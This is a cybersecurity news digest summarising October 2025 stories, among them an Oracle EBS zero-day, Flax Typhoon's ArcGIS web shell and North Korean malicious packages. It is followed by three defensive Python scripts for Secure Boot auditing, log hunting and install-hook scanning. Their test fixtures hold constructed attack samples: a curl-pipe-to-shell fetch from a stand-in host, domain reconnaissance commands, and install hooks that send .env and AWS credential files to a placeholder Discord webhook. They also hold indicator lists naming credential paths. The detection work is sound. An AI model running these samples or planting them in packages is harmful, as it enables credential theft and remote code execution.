Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 11713
Checks for new stories every ~15 minutes
| Time | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2025-10-14 16:42:58 | bleepingcomputer | VULNERABILITIES | Oracle Patches Critical Zero-Day Vulnerability in E-Business Suite | Oracle addressed a critical zero-day vulnerability (CVE-2025-61884) in its E-Business Suite, exploited by ShinyHunters, with an out-of-band security update over the weekend. The vulnerability allowed unauthenticated remote access to sensitive resources, posing significant risk to affected systems. Despite the active exploitation, Oracle did not publicly disclose the issue's severity or the existence of a publicly leaked exploit. Researchers confirmed the fix addresses a pre-authentication Server-Side Request Forgery (SSRF) flaw, closing the hole the leaked exploit relies on. Oracle E-Business Suite users are urged to apply the latest patches to break the known exploit chains. The Clop ransomware group and ShinyHunters have been linked to exploitation of similar vulnerabilities, emphasizing the need for vigilance and timely patching. Security experts recommend additional measures, such as ModSecurity rules in front of the vulnerable endpoints, until patches are fully deployed. | Details |
| 2025-10-14 14:58:01 | bleepingcomputer | VULNERABILITIES | Dispute Over CVE Credit Raises Concerns in Vulnerability Reporting | FuzzingLabs accuses Gecko Security of replicating its vulnerability disclosures and claiming CVE credits, sparking a public dispute between the two cybersecurity firms. FuzzingLabs alleges Gecko copied proof-of-concepts and backdated blog posts to appear as the original discoverer of vulnerabilities. Gecko Security denies the allegations, attributing the situation to an unfortunate overlap and emphasizing direct coordination with project maintainers. FuzzingLabs claims to possess evidence of plagiarism, including unique identifiers in their exploits, and notes that multiple vulnerabilities on Gecko's site seem copied from other researchers. Gecko has since updated its blog posts to credit FuzzingLabs and adjusted publishing dates, while maintaining that some CVEs were marked as duplicates or invalid. The incident underscores challenges in managing duplicate vulnerability reports and the complexities of crediting in responsible disclosure practices. The broader security community remains divided, with some questioning Gecko's explanation and others highlighting the need for improved coordination in vulnerability reporting. | Details |
| 2025-10-14 14:19:13 | theregister | DATA BREACH | Asahi Brewer Faces Data Breach After Ransomware Attack Disrupts Operations | Asahi, the major Japanese brewer, suffered a ransomware attack in September that caused significant operational disruption and a likely data breach. The Qilin ransomware group claimed responsibility, alleging the theft of 27 GB of sensitive data, including contracts, employee records, and financial information. Initial reports pointed to a system failure, but further investigation found traces of unauthorized data transfers, raising concerns about exposure of personal data. The attack severely affected Asahi's logistics, delaying shipments and forcing a temporary return to manual processes such as pen and paper. Asahi postponed its quarterly financial results because of ongoing system outages and difficulty accessing accounting data, with no clear recovery timeline. The company is investigating the extent of the breach and plans to notify affected individuals in line with data protection laws. A UK National Cyber Security Centre report of a 50% rise in nationally significant cyber incidents suggests a broader trend affecting businesses globally. | Details |
| 2025-10-14 14:02:04 | bleepingcomputer | MISCELLANEOUS | The Security Challenges of Autonomous AI Agents in Enterprises | The rise of autonomous AI agents is reshaping enterprise operations, with these systems now performing tasks such as ticket management, log analysis, and incident remediation independently. Unlike traditional bots, these agents can interpret goals, plan steps, and interact with multiple systems, making them powerful but risky users within an organization. Multi-agent ecosystems make it hard to trace an action back to the human who initiated it, complicating accountability and oversight. Companies also face "shadow AI", where AI tools enter environments without formal security review, creating governance gaps. Traditional visibility tools struggle to detect these agents, which can run at machine speed across cloud functions or virtual machines and so elude standard oversight mechanisms. Enterprises are advised to build AI agent inventories that record each agent's purpose, permissions, and lifespan. Effective governance requires redefining access controls so agents get only the privileges their task needs, ensuring human oversight, and blocking unauthorized actions. Treating AI agents as a distinct category of identity, separate from both human users and conventional service accounts, is essential for maintaining security and operational integrity. | Details |
| 2025-10-14 13:36:14 | theregister | MISCELLANEOUS | Mozilla Launches Beta Test for Firefox's Integrated VPN Feature | Mozilla is starting a beta test of a built-in VPN feature in Firefox, selecting users at random to participate over the coming months. The Firefox VPN will be free and integrated into the browser, unlike Mozilla's existing paid VPN service, which covers multiple devices. The feature routes the browser's web traffic through Mozilla-managed servers, masking the user's IP address from visited sites and encrypting traffic between the browser and those servers. Initially available on desktop, it may expand to mobile platforms, reflecting Mozilla's ambition to offer a leading VPN-integrated browser. Participants must sign in with a Mozilla account, and their VPN location will default to the best-performing server, primarily within the US. Mozilla says it will retain minimal logs for three months to improve performance and security, without logging visited websites or the content of communications. The initiative comes amid increased interest in VPNs, especially in the UK, where they are used to bypass age verification checks under the Online Safety Act. | Details |
| 2025-10-14 13:30:28 | bleepingcomputer | VULNERABILITIES | Framework Linux Systems Face Secure Boot Bypass Vulnerability | Approximately 200,000 Framework Linux systems shipped with signed UEFI components that can be abused to bypass Secure Boot. The weakness is the 'memory modify' (mm) command in Framework-signed UEFI shells: because the shell is trusted by Secure Boot, an attacker who can boot it gets arbitrary write access to firmware memory and can switch off image signature verification. That is enough to load a bootkit such as BlackLotus, which runs before the OS, evades OS-level security, and survives OS reinstalls. Eclypsium found that mm can overwrite the gSecurity2 pointer, through which the firmware reaches its image-verification handler, breaking the Secure Boot trust chain. Framework is working on remediation and advises users to apply firmware updates as they ship or to rely on secondary protections in the meantime. Temporary mitigations include removing Framework's certificate from the Secure Boot db in firmware setup, so the signed shell is no longer trusted (along with any other boot component signed with that certificate), and preventing unauthorized physical access to affected systems. The incident emphasizes the need for thorough security validation of firmware components before they are signed. | Details |
| 2025-10-14 12:37:53 | theregister | VULNERABILITIES | Oracle Releases Emergency Patch for E-Business Suite Vulnerability | Oracle issued an emergency patch for a critical vulnerability in the Runtime UI component of its E-Business Suite, tracked as CVE-2025-61884. The flaw carries a CVSS score of 7.5 and is remotely exploitable without authentication, posing significant risk to enterprise systems. It could let attackers access sensitive resources, potentially leading to data theft or further network intrusion. Oracle advises applying the patch, or its mitigations, immediately. The patch follows a recent fix for an earlier zero-day vulnerability linked to Clop attacks that affected numerous organizations, including universities and major enterprises. Google's Threat Intelligence Group reported "dozens" of confirmed victims and expects the real number to exceed a hundred. Harvard University is investigating a cybersecurity incident related to the Oracle EBS breaches, affecting a small administrative unit. The run of EBS vulnerabilities highlights the need for timely patch management and comprehensive security reviews. | Details |
| 2025-10-14 12:29:58 | bleepingcomputer | NATION STATE ACTIVITY | Chinese APT Exploits ArcGIS for Stealthy Network Intrusion | Chinese state-sponsored hackers maintained access to a target environment for more than a year by turning ArcGIS, a geo-mapping platform, into a web shell. The attackers, identified as Flax Typhoon, used valid administrator credentials to compromise a public-facing ArcGIS server that was connected to an internal network. They uploaded a malicious Java Server Object Extension (SOE) and drove it through the server's REST API, passing base64-encoded commands in requests that looked like routine map operations. For persistence they installed SoftEther VPN Bridge, which opened an outbound HTTPS tunnel to their infrastructure and gave them a path for lateral movement and data exfiltration. ReliaQuest researchers also observed attempts to escalate privileges by targeting IT staff workstations to harvest credentials and push deeper into the network. ReliaQuest says abuse of an SOE in this way had not been seen before, and Esri has updated its documentation to warn customers about the risk of malicious SOEs. The incident underscores the need to monitor legitimate software for unusual activity and to harden internal networks against advanced persistent threats. | Details |
| 2025-10-14 11:57:08 | thehackernews | MISCELLANEOUS | Proactive Threat Hunting Enhances Security Beyond Awareness Campaigns | Cybersecurity Awareness Month, run by CISA and the National Cybersecurity Alliance, aims to foster safer digital habits among individuals and organizations. Awareness campaigns improve employee behavior but do not address deeper weaknesses such as misconfigurations and excessive privileges. Traditional defenses focus on detection and response, leaving out the proactive work needed to find and remove exposures early. Proactive threat hunting identifies attack paths such as misconfigurations and exposed credentials before they are exploited. Continuous Threat Exposure Management (CTEM) offers a structured approach to threat modeling and control validation, strengthening overall security posture. Attackers use AI-driven automation to map infrastructure rapidly, so defenders need equally proactive strategies to keep up. Organizations are encouraged to shift from awareness to readiness, ensuring defenses are robust and capable of withstanding real-world threats. | Details |
| 2025-10-14 11:48:12 | thehackernews | VULNERABILITIES | AMD Addresses Critical SEV-SNP Vulnerability in Confidential Computing | AMD has issued fixes for RMPocalypse, a critical vulnerability in its Secure Encrypted Virtualization-Secure Nested Paging (SEV-SNP) technology that undermines confidential computing guarantees. Researchers from ETH Zürich found that a single 8-byte memory write is enough to corrupt the Reverse Map Table (RMP), the structure that holds the security metadata for every DRAM page. The flaw, CVE-2025-0033, is a race condition while the AMD Secure Processor initializes the RMP, during which a malicious hypervisor can modify RMP contents. Exploitation lets the hypervisor break the isolation of confidential virtual machines, enabling unauthorized access, activation of hidden functions, and exfiltration of sensitive data, with a reported 100% success rate. Microsoft and Supermicro have acknowledged the issue: Microsoft is working on remediation for Azure Confidential Computing, and Supermicro requires BIOS updates for affected motherboards. The case shows that incomplete protection of a single data structure can collapse the security model of a virtualization technology. The discovery follows recent findings of similar vulnerabilities in cloud processors, emphasizing ongoing challenges in securing virtualized environments. | Details |
| 2025-10-14 11:19:49 | thehackernews | VULNERABILITIES | New Android Flaw Allows Rogue Apps to Steal 2FA Codes | Researchers have disclosed Pixnapping, a vulnerability in Android devices from Google and Samsung that lets a rogue app covertly steal two-factor authentication codes. The attack combines Android APIs with a hardware side channel, allowing a malicious app that holds no special permissions to capture sensitive on-screen data, such as 2FA codes, in under 30 seconds. It affects Android versions 13 to 16 and potentially every device running them, though the study tested five specific models. Google has shipped a patch under CVE-2025-48561, but the researchers found a workaround that re-enables the attack, so work on a more comprehensive fix continues. The flaw also lets attackers determine whether specific apps are installed, bypassing Android's app list restrictions; Google has decided not to address that part. The vulnerability shows that apps handling secrets should be designed with side-channel leakage in mind rather than relying on platform isolation alone. Organizations should keep Android devices current with security patches and educate users on the risks of installing untrusted apps. | Details |
| 2025-10-14 11:03:20 | theregister | CYBERCRIME | UK Cyberattacks Surge by 50%, Urging Immediate Business Action | The UK's National Cyber Security Centre (NCSC) reported a 50% increase in high-severity cyberattacks, with 204 nationally significant incidents in the past year. Despite a stable number of total incidents, the rise in severity signals growing exposure to serious impacts on business operations and national resilience. NCSC's Chief Executive emphasized the urgency for businesses to strengthen cybersecurity measures, warning that hesitation poses a significant vulnerability. Senior UK ministers are reaching out to FTSE 100 and 250 companies, urging them to prioritize cybersecurity at the board level and adopt NCSC's Early Warning service. Companies are encouraged to implement the Cyber Essentials standard, which significantly reduces the likelihood of cyber insurance claims and enhances supply chain security. Recent cyberattacks on major UK brands, such as M&S and Jaguar Land Rover, serve as a critical reminder of the need for robust cybersecurity strategies. The NCSC's report calls for immediate action from business leaders to ensure continuity plans are in place, highlighting the importance of preparedness in the face of potential infrastructure disruptions. | Details |
| 2025-10-14 11:03:19 | thehackernews | MISCELLANEOUS | AI Revolutionizes Cyber Reconnaissance, Enhancing Web Application Attack Strategies | AI is transforming reconnaissance by enabling attackers to map environments with increased speed and precision, enhancing their understanding of system behaviors. While AI is not yet executing attacks autonomously, it accelerates information gathering and enriches data, aiding attackers in identifying potential vulnerabilities. The technology excels in parsing unstructured data, such as website content and error messages, providing attackers with a comprehensive view of target infrastructures. AI's ability to generate realistic credential combinations and adapt to system behaviors improves the effectiveness of brute force and credential harvesting attacks. Attackers benefit from AI's contextual awareness, reducing false positives and enabling more targeted and efficient attack strategies. The expanded definition of exposure in the AI era includes not just direct vulnerabilities but also inferable information from metadata and naming conventions. Defenders must adopt AI-driven strategies to anticipate attacker insights and continuously validate their security postures to keep pace with evolving threats. | Details |
| 2025-10-14 07:13:57 | thehackernews | NATION STATE ACTIVITY | North Korean Actors Exploit npm, PyPI, RubyGems for Data Theft | Researchers identified malicious packages across the npm, PyPI, and RubyGems ecosystems that use Discord channels for command-and-control and exfiltrate developer data. Discord webhooks are write-only, so stolen data can be posted without the channel history being exposed, which complicates detection and response. The packages use install-time hooks to steal .env files, API keys, and similar secrets from developer environments before any runtime monitoring can see them. The Contagious Interview campaign, linked to North Korean actors, used 338 fake packages to distribute malware to Web3, cryptocurrency, and blockchain developers. The threat actors ran over 180 fake personas on platforms like LinkedIn to lure targets into downloading booby-trapped repositories, leading to credential and data theft. Their packages included typosquats and lookalikes of legitimate libraries to slip into developer workflows unnoticed. The campaign exemplifies a state-directed, factory-style approach to supply chain attacks and underscores the need for install-time controls and vigilance in software ecosystems. | Details |
| 2025-10-14 06:49:00 | theregister | MISCELLANEOUS | EU Biometric Border System Launch Faces Initial Operational Challenges | The European Union's new biometric Entry/Exit System (EES) went live at Prague's international airport with significant operational problems, including malfunctioning equipment and a fallback to manual processing. Travelers experienced delays of up to 90 minutes because self-service enrollment machines were not working, hurting the airport's throughput and passenger satisfaction. The EES requires non-EU travelers to register fingerprints and facial biometrics, with the aim of streamlining border control across the Schengen area. Prague Airport warned passengers of potential delays during the initial phase and worked to resolve the equipment issues quickly. The EES rollout is part of a broader EU initiative, with full implementation expected by March 2026, alongside the upcoming European Travel Information and Authorisation System (ETIAS). The Czech Republic, Estonia, and Luxembourg opted for immediate EES implementation, affecting popular destinations like Prague, which has seen a significant increase in British visitors. Despite the initial setbacks, making the system work reliably is essential for efficient border management as passenger volumes rise. | Details |
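On the Framework Secure Boot item above: the stop-gap mitigation is to stop trusting Framework's certificate in the Secure Boot db, and the first thing a practitioner wants is to see exactly what the firmware trusts right now. The following is an added example, not Eclypsium's or Framework's code. It parses the EFI_SIGNATURE_LIST format in which db and dbx are stored and reports the certificates and image hashes they contain; a small builder is included only to construct an offline sample. The signature-type GUIDs, the db variable GUID and the 4-byte efivarfs attribute prefix come from the UEFI specification and Linux; the sample owner GUID, fake certificate bytes and hashes are constructed and do not correspond to any vendor.

```python
"""Parse UEFI Secure Boot signature databases (db, dbx, KEK, PK) stored in
EFI_SIGNATURE_LIST format and report which certificates and image hashes the
firmware trusts or revokes.  Added example, not Eclypsium's or Framework's
code.  The sample database at the bottom is constructed."""
import hashlib
import struct
import uuid

# Signature-type GUIDs from the UEFI specification.
EFI_CERT_X509_GUID = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072")
EFI_CERT_SHA256_GUID = uuid.UUID("c1c41626-504c-4092-aca9-41f936934328")
TYPE_NAMES = {EFI_CERT_X509_GUID: "X509", EFI_CERT_SHA256_GUID: "SHA256"}

# Variable GUID shared by db and dbx; efivarfs names them db-<guid>, dbx-<guid>.
EFI_IMAGE_SECURITY_DATABASE_GUID = "d719b2cb-3d3a-4596-a3bc-dad00e67656f"
EFIVARS = "/sys/firmware/efi/efivars"
HDR_LEN = 28  # SignatureType(16) + ListSize(4) + HeaderSize(4) + SignatureSize(4)


def strip_efivarfs_header(blob: bytes) -> bytes:
    """efivarfs prefixes every variable with a 4-byte attributes word."""
    if len(blob) < 4:
        raise ValueError("efivarfs blob too short")
    return blob[4:]


def parse_signature_lists(data: bytes):
    """Return [(type_name, owner_guid, payload)] for every entry in the blob."""
    entries, off = [], 0
    while off < len(data):
        if len(data) - off < HDR_LEN:
            raise ValueError("truncated EFI_SIGNATURE_LIST header")
        sig_type = uuid.UUID(bytes_le=data[off:off + 16])
        list_size, hdr_size, sig_size = struct.unpack_from("<III", data, off + 16)
        if list_size < HDR_LEN + hdr_size or off + list_size > len(data) or sig_size <= 16:
            raise ValueError("inconsistent EFI_SIGNATURE_LIST sizes")
        body = data[off + HDR_LEN + hdr_size:off + list_size]
        if len(body) % sig_size:
            raise ValueError("list body is not a multiple of SignatureSize")
        for i in range(0, len(body), sig_size):
            owner = uuid.UUID(bytes_le=body[i:i + 16])  # EFI_SIGNATURE_DATA.SignatureOwner
            entries.append((TYPE_NAMES.get(sig_type, str(sig_type)), owner, body[i + 16:i + sig_size]))
        off += list_size
    return entries


def find_hash(entries, digest: bytes) -> bool:
    """True if a SHA-256 entry equals `digest`.  Note: db/dbx hashes are
    Authenticode PE image hashes, not the sha256sum of the file on disk."""
    return any(t == "SHA256" and p == digest for t, _, p in entries)


def cert_fingerprints(entries):
    """SHA-256 over each DER certificate payload, for comparison with vendor lists."""
    return [hashlib.sha256(p).hexdigest() for t, _, p in entries if t == "X509"]


def build_signature_list(sig_type: uuid.UUID, owner: uuid.UUID, payloads) -> bytes:
    """Encode one EFI_SIGNATURE_LIST (all payloads in a list share one size)."""
    sizes = {len(p) for p in payloads}
    if len(sizes) != 1:
        raise ValueError("payloads in one list must be the same size")
    sig_size = 16 + sizes.pop()
    body = b"".join(owner.bytes_le + p for p in payloads)
    return sig_type.bytes_le + struct.pack("<III", HDR_LEN + len(body), 0, sig_size) + body


# Constructed sample: a fake 40-byte "certificate" plus two image hashes.
FAKE_OWNER = uuid.UUID("11111111-2222-3333-4444-555555555555")
FAKE_CERT_DER = bytes(range(40))
HASH_A = hashlib.sha256(b"constructed-image-A").digest()
HASH_B = hashlib.sha256(b"constructed-image-B").digest()
SAMPLE_DB = (build_signature_list(EFI_CERT_X509_GUID, FAKE_OWNER, [FAKE_CERT_DER])
             + build_signature_list(EFI_CERT_SHA256_GUID, FAKE_OWNER, [HASH_A, HASH_B]))


def load_variable(name: str):
    """Read and parse a real db/dbx variable from efivarfs on Linux."""
    with open(f"{EFIVARS}/{name}-{EFI_IMAGE_SECURITY_DATABASE_GUID}", "rb") as fh:
        return parse_signature_lists(strip_efivarfs_header(fh.read()))


if __name__ == "__main__":
    try:
        entries, source = load_variable("db"), "db"
    except OSError:
        entries, source = parse_signature_lists(SAMPLE_DB), "constructed sample"
    print(f"{source}: {len(entries)} entries")
    for kind, owner, payload in entries:
        tag = hashlib.sha256(payload).hexdigest() if kind == "X509" else payload.hex()
        print(f"  {kind:6} owner={owner} {tag[:16]}...")
```

Run on a Linux host, the script lists the db entries directly from efivarfs (falling back to the constructed sample where efivarfs is absent); compare the X509 fingerprints with the vendor's published certificate to confirm whether Framework's key is still trusted after the BIOS change. To check whether a particular signed shell binary is revoked in dbx, compute its Authenticode hash with a PE-aware tool rather than `sha256sum`, then pass it to `find_hash`.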
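On the Flax Typhoon ArcGIS item above: the operators' commands reached the malicious SOE as base64 strings inside REST requests that looked like ordinary map parameters, which is exactly the kind of thing a web-server access log preserves. The following is an added example (not ReliaQuest's or Esri's code) of the hunt a defender can run over such logs: it decodes base64-looking query parameters in ArcGIS REST requests, keeps only those whose plaintext reads like a shell command, and marks requests that hit an SOE endpoint under `/exts/`, the path segment ArcGIS Server uses for server object extensions. The log lines are constructed in Common Log Format; the SOE name, the `cmd` parameter, the addresses and the command-token list are assumptions, and the check will not catch payloads that are compressed or encrypted before encoding.

```python
"""Hunt for base64-encoded commands smuggled through ArcGIS REST calls,
especially to Server Object Extension (SOE) endpoints under /exts/.
Added example, not ReliaQuest's or Esri's code.  Log lines are constructed;
the SOE name, `cmd` parameter and addresses are assumptions."""
import base64
import binascii
import re
import string
from urllib.parse import parse_qsl, quote, urlsplit

# Common Log Format: host ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})')
B64_RE = re.compile(r'^[A-Za-z0-9+/=_-]{12,}$')  # standard or URL-safe alphabet
# Tokens that rarely occur in legitimate GIS parameters but do in shell payloads.
COMMAND_TOKENS = ("whoami", "cmd.exe", "powershell", "/bin/sh", "bash -c", "net user",
                  "certutil", "curl ", "wget ", "nltest", "tasklist", "| sh", "&&")
PRINTABLE = set(string.printable)


def decode_base64_text(value: str):
    """Decode standard or URL-safe base64; None unless the result is printable text."""
    v = value.replace("-", "+").replace("_", "/")
    v += "=" * (-len(v) % 4)  # tolerate stripped padding
    try:
        text = base64.b64decode(v, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text and all(c in PRINTABLE for c in text) else None


def analyze_line(line: str):
    """Return a list of findings for one access-log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    soe_endpoint = "/exts/" in url.path.lower()
    findings = []
    for param, value in parse_qsl(url.query, keep_blank_values=True):
        if not B64_RE.match(value):
            continue
        text = decode_base64_text(value)
        if text is None:
            continue
        indicators = [t for t in COMMAND_TOKENS if t in text.lower()]
        if indicators:
            findings.append({"src": m.group("src"), "ts": m.group("ts"), "path": url.path,
                             "param": param, "decoded": text, "indicators": indicators,
                             "soe_endpoint": soe_endpoint})
    return findings


def scan(lines):
    out = []
    for line in lines:
        out.extend(analyze_line(line) or [])
    return out


def _b64(cmd: bytes, urlsafe=False) -> str:
    """Encode as a client would put it in a query string (URL-escaped base64)."""
    enc = base64.urlsafe_b64encode(cmd) if urlsafe else base64.b64encode(cmd)
    return quote(enc.decode(), safe="")


# Constructed sample log (not a real capture): two benign requests, two SOE abuses.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Oct/2025:10:01:02 +0000] "GET /arcgis/rest/services/Roads/MapServer/0/query?where=1%3D1&f=json HTTP/1.1" 200 5120',
    '203.0.113.7 - - [14/Oct/2025:10:01:09 +0000] "GET /arcgis/rest/services/Roads/MapServer/exts/RouteSOE/route?stops=1,2,3&f=json HTTP/1.1" 200 812',
    '198.51.100.23 - - [14/Oct/2025:10:04:41 +0000] "GET /arcgis/rest/services/Roads/MapServer/exts/RouteSOE/exec?cmd='
    + _b64(b"cmd.exe /c whoami && net user /domain") + '&f=json HTTP/1.1" 200 1433',
    '198.51.100.23 - - [14/Oct/2025:10:05:03 +0000] "POST /arcgis/rest/services/Roads/MapServer/exts/RouteSOE/exec?cmd='
    + _b64(b"/bin/sh -c 'curl http://198.51.100.9/p.sh | sh'", urlsafe=True) + ' HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "SOE" if f["soe_endpoint"] else "   "
        print(f'{f["ts"]} {f["src"]:15} {flag} {f["path"]} {f["param"]}={f["decoded"]!r} {f["indicators"]}')
```

Feed it the ArcGIS web adaptor or reverse-proxy access log; a finding on an `/exts/` path from an address that also appears in ArcGIS Manager logins is the pattern the article describes. Because the SOE itself is a custom Java component, also baseline which SOEs are registered on each server and alert on any addition, since the REST path of a new SOE will not be in any signature.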
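On the npm/PyPI/RubyGems item above: install-time hooks are the hinge of the attack, since an npm lifecycle script (`preinstall`, `install`, `postinstall`, `prepare`) or an overridden setuptools install command runs during installation, before anything is watching the process. The following is an added example, not the researchers' code and not a replacement for a real supply-chain scanner. It pulls those hooks out of a package.json or setup.py, follows an npm hook that runs a local script file so the payload is scanned with the hook, looks for exfiltration indicators such as Discord webhook URLs and reads of .env or credential files, and runs an edit-distance check of the package name against a list of popular packages to catch typosquats. It covers npm and PyPI only; the indicator patterns, the popular-package list, the two malicious manifests and the webhook URL in them are constructed.

```python
"""Flag install-time hooks and exfiltration indicators in npm and PyPI package
manifests, plus a typosquat check on the package name.  Added example for the
supply-chain item above, not the researchers' code.  All manifests, scripts
and the webhook URL below are constructed, not real packages."""
import json
import re
import sys

# npm lifecycle scripts that run automatically during `npm install`.
NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# setuptools command classes a setup.py can override to run code at `pip install`.
PIP_HOOK_RE = re.compile(r"cmdclass\s*=\s*\{[^}]*['\"](install|develop|egg_info|build_py)['\"]")

# (label, regex, severity): heuristic indicators, tune them for your own repositories.
INDICATORS = [
    ("discord-webhook", r"discord(?:app)?\.com/api/webhooks/", "high"),
    ("dotenv-read", r"\.env\b", "high"),
    ("credential-path", r"\.npmrc|\.ssh/|id_rsa|\.aws/credentials|\.git-credentials", "high"),
    ("remote-exec", r"(?:curl|wget)\b.*\|\s*(?:sh|bash|node|python)", "high"),
    ("env-harvest", r"process\.env|os\.environ", "medium"),
    ("eval", r"\beval\(|new Function\(|fromCharCode|\bexec\(", "medium"),
    ("base64", r"base64", "medium"),
    ("outbound-http", r"https?://|fetch\(|http\.request|urllib|requests\.", "medium"),
]
SEVERITY = {"low": 0, "medium": 1, "high": 2}
# Hook commands that are common and expected (native builds, git hooks).
KNOWN_BUILD_CMDS = ("node-gyp rebuild", "prebuild-install", "husky")


def find_indicators(text):
    return [(label, sev) for label, pat, sev in INDICATORS
            if re.search(pat, text, re.IGNORECASE | re.DOTALL)]


def _level(hits, default):
    return max((s for _, s in hits), key=SEVERITY.__getitem__) if hits else default


def referenced_scripts(command):
    """Local script files a hook command runs, e.g. `node lib/setup.js`."""
    return re.findall(r"[\w./-]+\.(?:[cm]?js|py)\b", command)


def scan_npm(manifest, files=None):
    """`files` maps package-relative paths to contents, so a hook that runs a
    local script is scanned together with that script."""
    files = files or {}
    findings = []
    for hook in NPM_HOOKS:
        cmd = manifest.get("scripts", {}).get(hook)
        if not cmd:
            continue
        text, unread = cmd, []
        for path in referenced_scripts(cmd):
            if path in files:
                text += "\n" + files[path]
            else:
                unread.append(path)  # the hook runs code we could not inspect
        hits = find_indicators(text)
        if hits or unread:
            level = _level(hits, "medium")
        elif cmd.startswith(KNOWN_BUILD_CMDS):
            level = "low"
        else:
            level = "medium"
        findings.append({"package": manifest.get("name"), "hook": hook, "command": cmd,
                         "level": level, "indicators": [l for l, _ in hits], "unread": unread})
    return findings


def scan_setup_py(name, source):
    """A setup.py that overrides install/develop/egg_info runs code at pip install time."""
    m = PIP_HOOK_RE.search(source)
    if not m:
        return []
    hits = find_indicators(source)
    return [{"package": name, "hook": "cmdclass:" + m.group(1), "command": "setup.py",
             "level": _level(hits, "medium"), "indicators": [l for l, _ in hits], "unread": []}]


def edit_distance(a, b):
    """Levenshtein distance in O(len(a) * len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name, popular, max_dist=2):
    base = name.split("/")[-1]  # drop an npm scope such as @org/
    if len(base) < 5:           # very short names collide by chance
        return []
    return [p for p in popular if p != base and edit_distance(base, p) <= max_dist]


# --- constructed samples (not real packages) ---
MALICIOUS_NPM = {"name": "lodahs", "version": "4.17.99",
                 "scripts": {"postinstall": "node lib/setup.js"}}
MALICIOUS_FILES = {"lib/setup.js":
                   "const fs=require('fs'),os=require('os');\n"
                   "const env=fs.readFileSync('.env','utf8');\n"
                   "fetch('https://discord.com/api/webhooks/0000/constructed',"
                   "{method:'POST',body:JSON.stringify({h:os.hostname(),env})});\n"}
BENIGN_NPM = {"name": "fast-native-thing", "scripts": {"install": "node-gyp rebuild"}}
MALICIOUS_SETUP_PY = (
    "from setuptools import setup\nfrom setuptools.command.install import install\n"
    "import base64, os, urllib.request\n"
    "class PostInstall(install):\n"
    "    def run(self):\n"
    "        install.run(self)\n"
    "        creds = open(os.path.expanduser('~/.aws/credentials'), 'rb').read()\n"
    "        urllib.request.urlopen('https://discord.com/api/webhooks/0000/constructed',\n"
    "                               base64.b64encode(creds))\n"
    "setup(name='requestz', version='0.1', cmdclass={'install': PostInstall})\n")
POPULAR = ["lodash", "express", "react", "axios", "requests"]

if __name__ == "__main__":
    if len(sys.argv) > 1:  # scan a real package.json given on the command line
        with open(sys.argv[1]) as fh:
            manifest = json.load(fh)
        report = scan_npm(manifest) + [{"typosquat": typosquat_candidates(manifest.get("name", ""), POPULAR)}]
    else:
        report = (scan_npm(MALICIOUS_NPM, MALICIOUS_FILES) + scan_npm(BENIGN_NPM)
                  + scan_setup_py("requestz", MALICIOUS_SETUP_PY)
                  + [{"typosquat": typosquat_candidates("lodahs", POPULAR)}])
    print(json.dumps(report, indent=2))
```

The structural signal (a lifecycle hook that runs a script the scanner cannot read) is worth alerting on by itself, which is why an unread script is rated medium even with no indicator hits. In CI the cheaper control is to install with `npm ci --ignore-scripts` and `pip install --only-binary :all:` so these hooks never execute, and to run a scan like this on the lockfile diff before allowing scripts for packages that genuinely need a native build.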